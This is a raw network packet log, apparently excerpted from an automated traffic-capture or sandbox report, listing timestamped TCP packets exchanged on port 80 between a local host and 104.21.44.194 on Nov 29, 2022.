                                                                          Nov 29, 2022 09:20:40.405976057 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406011105 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406047106 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406081915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406100988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406100988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406100988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406100988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406100988 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406126976 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406174898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406213045 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406248093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406270027 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406270027 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406282902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406318903 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406343937 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406353951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406388998 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406423092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406457901 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406491995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406527042 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406527042 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406527042 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406527042 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406568050 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406611919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406651974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406687021 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406713009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406713009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406713009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406713009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406713009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406713009 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406722069 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406752110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406789064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406835079 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406864882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406864882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406864882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.406881094 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406930923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.406966925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.407001972 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.407016993 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407016993 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407016993 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407016993 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407037020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.407064915 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.407185078 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407186031 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407186031 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.407356024 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414057970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414092064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414119005 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414144993 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414171934 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414197922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414222956 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414248943 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414275885 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414303064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414329052 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414355040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414381027 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414411068 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414421082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414421082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414421082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414421082 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414443970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414477110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414504051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414530039 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414556026 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414581060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414601088 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414601088 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414607048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414632082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.414760113 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414760113 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.414937973 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.427757978 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436281919 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436295986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436316967 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436444998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436480999 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436492920 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436503887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436515093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436527014 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436537981 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436548948 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436562061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436573982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436584949 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436589956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436589956 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436595917 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436608076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436620951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436631918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436641932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436652899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436664104 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436799049 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436811924 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436815977 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.436882973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436894894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436906099 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436916113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436927080 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436938047 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436948061 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436959028 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436969995 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436980963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.436994076 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437006950 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.437017918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449897051 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.449907064 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450009108 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450145006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.450145006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.529704094 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538132906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538238049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538249016 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538259983 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538285971 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538343906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538369894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538383007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538393974 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538404942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538414955 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538427114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538439989 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538450003 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538460970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538471937 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538481951 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538492918 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538502932 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538513899 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538527012 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538707972 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538731098 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538754940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538769007 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538780928 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538791895 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538803101 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538815022 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538826942 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538837910 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538847923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538858891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538866043 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.538870096 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538880110 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538891077 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538902044 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538912058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538923025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538933992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538944006 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538954973 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538965940 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538976908 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.538997889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539030075 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539027929 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539031029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539031982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539041996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539052963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539063931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539073944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539084911 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539096117 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539105892 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539207935 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539247990 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539273024 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539298058 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539309025 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539319992 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539330959 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539341927 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539352894 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539364100 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539367914 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539376020 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539387941 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539398909 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539408922 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539419889 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539433002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539544106 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539577007 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539581060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539604902 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539617062 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539628029 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539638996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539649010 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539659977 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539670944 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539680958 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539691925 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539701939 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539712906 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539714098 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539724112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539733887 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539745092 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539756060 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539766073 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539777040 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539788008 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539865017 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539868116 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.539885998 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540021896 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540133953 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540146112 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540158033 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540169954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540182114 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540194035 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540205002 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540216923 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540229082 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540240049 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540251970 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540263891 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540275097 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540287018 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540397882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540397882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540397882 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540399075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540399075 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540568113 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540571928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540571928 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540579081 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540590048 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540601015 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540611982 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540621996 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540632963 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540643930 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540654898 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540735006 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540854931 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540867090 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540894985 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540899992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540899992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540899992 CET4985280192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:40.540920019 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540930986 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.540941954 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545293093 CET8049852104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:40.545304060 CET8049852104.21.44.194192.168.11.20
